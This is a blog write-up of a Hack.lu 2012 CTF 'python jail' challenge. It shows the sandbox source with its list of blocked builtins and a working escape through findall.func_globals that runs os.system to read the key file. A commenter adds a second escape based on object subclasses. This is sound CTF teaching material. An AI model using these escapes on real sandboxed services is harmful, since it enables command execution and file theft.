«

»

Oct
25

Hack.lu 2012 CTF Challenge #7 (200)

7 – python jail

You are surrounded by zombies. You heard there’s a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there’s another surviver over there. “Hey! Help me!”, you shout. He just laughs and shakes you off the fence. Asshole.

Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh… karma is a bitch. But that means you’ll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:

chall.py

ctf.fluxfingers.net tcp/2045

Hint:
You’ll find the entrance in “./key”

Notes:
This challenge is a tribute to PHDays Finals 2012 challenge ‘ndevice’.
Thanks again, I had fun solving it.

I’m fairly certain that this challenge avoids being exploitable by
the tricks we could use in PHDays (the module “os” was imported…).
So, no advantage for people who did not attend PHDays.

Summary: python eval tricks

def make_secure():
        UNSAFE_BUILTINS = ['open',
         'file',
         'execfile',
         'compile',
         'reload',
         '__import__',
         'eval',
         'input'] ## block object?
        for func in UNSAFE_BUILTINS:
                del __builtins__.__dict__[func]
 
from re import findall
make_secure()
 
while True:
    try:
        inp = findall('\S+', raw_input())[0]
        a = None
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e

There many solutions for this level. For example, we can use findall function’s globals to get sys module, then os and system:

$ nc ctf.fluxfingers.net 2045
Go Ahead, Expoit me >;D
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
findall.func_globals['sys'].modules['os'].system("cat\x20./key")
FvibLF0eBkCBk
Return Value: 0

The flag: FvibLF0eBkCBk

1 comment

  1. 0vercl0k says:

    Oh nice thanks for the trick ; here is mine:().__class__.__base__.__subclasses__()[40](‘./key’,’r’).read()

Leave a Reply to 0vercl0k Cancel reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>